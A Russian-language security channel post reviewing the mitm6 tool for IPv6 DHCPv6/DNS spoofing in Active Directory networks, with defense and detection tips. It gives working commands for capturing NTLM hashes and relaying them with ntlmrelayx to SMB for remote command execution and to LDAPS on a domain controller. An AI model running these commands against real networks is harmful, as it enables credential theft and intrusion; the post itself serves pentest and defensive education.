ОБЗОР УТИЛИТЫ MITM6: ФУНКЦИОНАЛ, АТАКИ И ЗАЩИТА

RedBlue Notes на связи! Сегодня расскажу о утилите, которую стоит запускать при пентесте любой инфраструктуры с Active Directory

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

ФУНКЦИОНАЛ MITM6
mitm6 - это инструмент для проведения MITM атак в сетях IPv6. Он позволяет эксплуатировать особенности работы протокола NDP (Neighbor Discovery Protocol) для перехвата трафика и потенциального получения учетных данных. mitm6 становится шлюзом по умолчанию для всех IPv6-клиентов в локальной сети. Это достигается путем прослушивания DHCPv6-запросов и отправки поддельных ответов, указывающих атакующего как DNS по умолчанию. После этого весь IPv6-трафик жертв начинает направляться к атакующему 💻

АТАКИ С ИСПОЛЬЗОВАНИЕМ MITM6 🔓
1. Захват NTLM-хэшей
После того как mitm6 стал DNS-сервером по умолчанию, он может отвечать на DNS-запросы поддельными записями, направляя трафик на контроллер атакующего. Если клиент попытается обратиться к несуществующему ресурсу (например, `wpad.domain.local`), mitm6 может предоставить адрес атакующего, который будет выдавать себя за WPAD-прокси. Это приведёт к автоматической отправке NTLM-аутентификации от клиента, которую можно перехватить

Запускаем mitm6:

mitm6 -d domain.local

Запускаем ntlmrelayx для захвата хэшей:

ntlmrelayx.py -6 -wh attacker_ip -of hashes.txt

Ждём....

Теперь, когда клиенты начнут использовать атакующего как DNS-сервер, их попытки аутентификации будут перехватываться и ретранслироваться 😼

2. Ретрансляция NTLM-хэшей
С помощью утилиты ntlmrelayx, которая часто используется совместно с mitm6, можно ретранслировать перехваченные NTLM-хэши на другие системы. Это позволяет выполнять атаки на повышение привилегий, например, создание новых пользователей или выполнение команд на удалённых системах 🕺

ntlmrelayx.py -6 -wh attacker_ip -t smb://target_ip -c "whoami"

3. Перехват LDAP-трафика
Если клиенты используют IPv6 для связи с контроллерами домена, mitm6 может перенаправить этот трафик через себя, что даёт возможность перехватить LDAP-запросы и потенциально получить доступ к конфиденциальной информации 🤫

ntlmrelayx.py -6 -wh attacker_ip -t ldaps://target_dc_ip

ЗАЩИТА ОТ MITM6 🛡
1. Отключите IPv6 (если не используется)
2. Настройте защиту от поддельных DHCP-ответов и RA-сообщений от неавторизованных источников
3. Использование статических маршрутов и DNS. Это снизит вероятность того, что они примут поддельные настройки от mitm6
4. Мониторьте трафик. Регулярный анализ сетевого трафика на предмет аномалий, таких как неожиданные изменения маршрутов или DNS-запросы к подозрительным адресам, может помочь обнаружить использование mitm6

ДЕТЕКТ MITM6 👀
1. Ищите аномальные DHCPv6-ответы в логах, это может указать на использование mitm6. Обратите внимание на новые IPv6-адреса, назначенные вручную и необычные DNS по умолчанию
2. Ищите подозрительные RA-сообщения, аномальные DNS-запросы и ответы
3. Используйте IDS/IPS для отслеживания подозрительных действий, связанных с IPv6 и NDP

Надеюсь, на этот канал подписаны Red и Blue тимеры из одной компании и они начнут играть в кошки-мышки с mitm6 после прочтения этого поста. Да начнутся Голодные игры, и пусть удача всегда будет с вами! 🥰

Подписывайтесь на канал, дальше больше!